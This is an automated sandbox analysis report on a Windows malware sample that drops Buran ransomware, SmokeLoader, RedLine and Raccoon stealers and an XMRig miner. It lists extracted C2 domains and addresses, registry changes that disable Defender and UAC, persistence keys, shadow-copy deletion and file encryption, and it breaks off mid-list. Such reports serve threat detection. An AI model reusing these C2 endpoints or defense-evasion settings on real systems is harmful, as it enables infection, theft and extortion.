Analysis
-
max time kernel
155s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-08-2021 21:23
Static task
static1
Behavioral task
behavioral1
Sample
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe
Resource
win10v20210408
General
-
Target
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe
-
Size
213KB
-
MD5
90a28a6ee672ff5a010a13a9817434e9
-
SHA1
ffe3910a3edfe90fa9c2060ab0d414405f0dbc64
-
SHA256
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e
-
SHA512
dd885ecd9e3f79320e8dc6f27640a02b9a332c1442d40a4ffc6bda40d148a349508ef31fa210b00ba024bffb6308a1180064e88bd18622edcf19cc964423e229
Malware Config
Extracted
https://www.zippyshare.cc/1630257393/download
Extracted
https://www.zippyshare.cc/1630257468/download
Extracted
https://www.zippyshare.cc/1630258463/download
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
redline
nn
135.181.49.56:47634
Extracted
raccoon
d02c5d65069fc7ce1993e7c52edf0c9c4c195c81
-
url4cnc
https://telete.in/open3entershift
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
D618.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Twitch\\TwitchUpdate.exe\"," D618.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/3060-191-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/3060-194-0x000000000041C5C6-mapping.dmp family_redline behavioral1/memory/2524-1366-0x000000000041C5A2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral1/files/0x000100000001ab2a-148.dat Nirsoft behavioral1/files/0x000100000001ab2a-151.dat Nirsoft behavioral1/files/0x000100000001ab2a-154.dat Nirsoft -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5116-1358-0x00000001402F327C-mapping.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 57 4208 powershell.exe 58 3512 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
Processes:
C2F8.exeC5C7.exeC6E2.exeC906.exeexplorer.exeD105.exeAdvancedRun.exeD414.exeD618.execsrss.execsrss.exeWindowsHost.exeWindowsAPI.exeD618.exesvhost.exeD618.exeSafeWindows.exeDriverVideocard.exesihost64.exesvhost.exepid Process 3712 C2F8.exe 2080 C5C7.exe 3852 C6E2.exe 2924 C906.exe 1084 explorer.exe 2504 D105.exe 2300 AdvancedRun.exe 2724 D414.exe 1064 D618.exe 4484 csrss.exe 2280 csrss.exe 4480 WindowsHost.exe 4312 WindowsAPI.exe 3656 D618.exe 2844 svhost.exe 2976 D618.exe 2564 SafeWindows.exe 2836 DriverVideocard.exe 2096 sihost64.exe 2524 svhost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
C2F8.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C2F8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C2F8.exe -
Deletes itself 1 IoCs
Processes:
pid Process 3052 -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/files/0x000100000001ab4e-1136.dat agile_net behavioral1/files/0x000100000001ab4e-1145.dat agile_net behavioral1/files/0x000100000001ab4e-1367.dat agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x000300000001ab25-119.dat themida behavioral1/files/0x000300000001ab25-120.dat themida behavioral1/memory/3712-132-0x0000000001340000-0x0000000001341000-memory.dmp themida -
Processes:
C5C7.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C5C7.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet C5C7.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C5C7.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C5C7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\C5C7.exe = "0" C5C7.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection C5C7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C5C7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" C5C7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" C5C7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C5C7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
C906.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\csrss.exe\" -start" C906.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run C906.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
C5C7.exeC2F8.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C5C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C2F8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C5C7.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
csrss.exedescription ioc Process File opened (read-only) \??\S: csrss.exe File opened (read-only) \??\G: csrss.exe File opened (read-only) \??\A: csrss.exe File opened (read-only) \??\Z: csrss.exe File opened (read-only) \??\X: csrss.exe File opened (read-only) \??\T: csrss.exe File opened (read-only) \??\R: csrss.exe File opened (read-only) \??\Q: csrss.exe File opened (read-only) \??\M: csrss.exe File opened (read-only) \??\L: csrss.exe File opened (read-only) \??\K: csrss.exe File opened (read-only) \??\Y: csrss.exe File opened (read-only) \??\W: csrss.exe File opened (read-only) \??\V: csrss.exe File opened (read-only) \??\I: csrss.exe File opened (read-only) \??\B: csrss.exe File opened (read-only) \??\N: csrss.exe File opened (read-only) \??\J: csrss.exe File opened (read-only) \??\H: csrss.exe File opened (read-only) \??\U: csrss.exe File opened (read-only) \??\P: csrss.exe File opened (read-only) \??\O: csrss.exe File opened (read-only) \??\F: csrss.exe File opened (read-only) \??\E: csrss.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 geoiptool.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
C2F8.exeD105.exepid Process 3712 C2F8.exe 2504 D105.exe 2504 D105.exe 2504 D105.exe 2504 D105.exe 2504 D105.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exeC5C7.exeD618.exeSafeWindows.exesvhost.exedescription pid Process procid_target PID 1832 set thread context of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 2080 set thread context of 3060 2080 C5C7.exe 100 PID 1064 set thread context of 3656 1064 D618.exe 141 PID 2564 set thread context of 5116 2564 SafeWindows.exe 159 PID 2844 set thread context of 2524 2844 svhost.exe 160 -
Drops file in Program Files directory 64 IoCs
Processes:
csrss.exedescription ioc Process File opened for modification C:\Program Files\TestUse.avi.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.exe csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ul-oob.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\wsimport.exe csrss.exe File opened for modification C:\Program Files\RenameConvertFrom.DVR.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-text.xml.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_Grace-ppd.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-pl.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_KMS_Client_AE-ppd.xrm-ms csrss.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\el\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML csrss.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-ul-phn.xrm-ms csrss.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019DemoR_BypassTrial180-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-pl.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL027.XML.payfast.8F1-9A6-E57 csrss.exe File created C:\Program Files\7-Zip\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-ms csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-ul-oob.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYMB.TTF csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PREVIEWTEMPLATE.POTX csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-phn.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN110.XML csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\EXPLODE.WAV csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL121.XML csrss.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-compat.xml.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Grace-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-ppd.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\artifacts.xml csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_MAK-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB.payfast.8F1-9A6-E57 csrss.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.payfast.8F1-9A6-E57 csrss.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png csrss.exe -
Drops file in Windows directory 1 IoCs
Processes:
WerFault.exedescription ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4960 3852 WerFault.exe 82 5080 3852 WerFault.exe 82 4172 3852 WerFault.exe 82 4300 3852 WerFault.exe 82 2712 3852 WerFault.exe 82 4788 3852 WerFault.exe 82 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 784 schtasks.exe 2308 schtasks.exe 2016 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 4124 vssadmin.exe -
Modifies registry class 1 IoCs
Processes:
D618.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings D618.exe -
Processes:
C906.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C906.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C906.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exepid Process 2376 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 2376 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid Process 3052 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exepid Process 2376 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
explorer.exeAdvancedRun.exeC5C7.exeC2F8.exepowershell.exepowershell.exepowershell.exeD105.exeWerFault.execvtres.exeWerFault.execmd.exeWerFault.exepowershell.exeWerFault.exeWerFault.exepowershell.exeWMIC.exedescription pid Process Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 1084 explorer.exe Token: SeImpersonatePrivilege 1084 explorer.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 2300 AdvancedRun.exe Token: SeImpersonatePrivilege 2300 AdvancedRun.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 2080 C5C7.exe Token: SeDebugPrivilege 3712 C2F8.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 2504 D105.exe Token: SeRestorePrivilege 4960 WerFault.exe Token: SeBackupPrivilege 4960 WerFault.exe Token: SeBackupPrivilege 4960 WerFault.exe Token: SeDebugPrivilege 3060 cvtres.exe Token: SeDebugPrivilege 4960 WerFault.exe Token: SeDebugPrivilege 5080 WerFault.exe Token: SeDebugPrivilege 4172 cmd.exe Token: SeDebugPrivilege 4300 WerFault.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 2712 WerFault.exe Token: SeDebugPrivilege 4788 WerFault.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 3512 powershell.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeIncreaseQuotaPrivilege 1368 WMIC.exe Token: SeSecurityPrivilege 1368 WMIC.exe Token: SeTakeOwnershipPrivilege 1368 WMIC.exe Token: SeLoadDriverPrivilege 1368 WMIC.exe Token: SeSystemProfilePrivilege 1368 WMIC.exe Token: SeSystemtimePrivilege 1368 WMIC.exe Token: SeProfSingleProcessPrivilege 1368 WMIC.exe Token: SeIncBasePriorityPrivilege 1368 WMIC.exe Token: SeCreatePagefilePrivilege 1368 WMIC.exe Token: SeBackupPrivilege 1368 WMIC.exe Token: SeRestorePrivilege 1368 WMIC.exe Token: SeShutdownPrivilege 1368 WMIC.exe Token: SeDebugPrivilege 1368 WMIC.exe Token: SeSystemEnvironmentPrivilege 1368 WMIC.exe Token: SeRemoteShutdownPrivilege 1368 WMIC.exe Token: SeUndockPrivilege 1368 WMIC.exe Token: SeManageVolumePrivilege 1368 WMIC.exe Token: 33 1368 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
D105.exepid Process 2504 D105.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exeC5C7.exeexplorer.exeD414.execmd.exedescription pid Process procid_target PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 1832 wrote to memory of 2376 1832 a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe 77 PID 3052 wrote to memory of 3712 3052 79 PID 3052 wrote to memory of 3712 3052 79 PID 3052 wrote to memory of 3712 3052 79 PID 3052 wrote to memory of 2080 3052 81 PID 3052 wrote to memory of 2080 3052 81 PID 